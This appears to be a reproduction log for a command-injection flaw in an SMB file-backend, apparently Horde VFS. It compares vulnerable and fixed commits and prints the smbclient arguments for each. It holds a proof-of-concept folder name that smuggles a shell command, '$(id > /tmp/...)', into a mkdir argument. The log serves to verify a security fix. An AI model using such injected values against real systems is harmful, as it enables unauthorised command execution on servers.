Repository: /data/pruva/project-cache/b34673b4-44bf-46c8-b663-ef8da3bf7b64/repo Vulnerable commit: 994f4a46fd76ea44eae2fe839216bb273ce49080 Fixed commit: 41f74b4acfc144e09013d04dd121e0a5da808361 === vulnerable (994f4a46fd76ea44eae2fe839216bb273ce49080) === Attempt vulnerable finished with rc=0 ARG //127.0.0.1/share ARG -Uuser ARG -D ARG // ARG -c ARG EXIT 0 ARG //127.0.0.1/share ARG -Uuser ARG -D ARG / ARG -c ARG mkdir ".dir"; EXIT 0 === fixed (41f74b4acfc144e09013d04dd121e0a5da808361) === Attempt fixed finished with rc=0 ARG //127.0.0.1/share ARG -U ARG user ARG -D ARG // ARG -c ARG ; EXIT 0 ARG //127.0.0.1/share ARG -U ARG user ARG -D ARG / ARG -c ARG mkdir "$(id > /tmp/horde_vfs_smb_poc_folder).dir"; EXIT 0 Reproduction confirmed: vulnerable commit executes attacker command, fixed commit does not.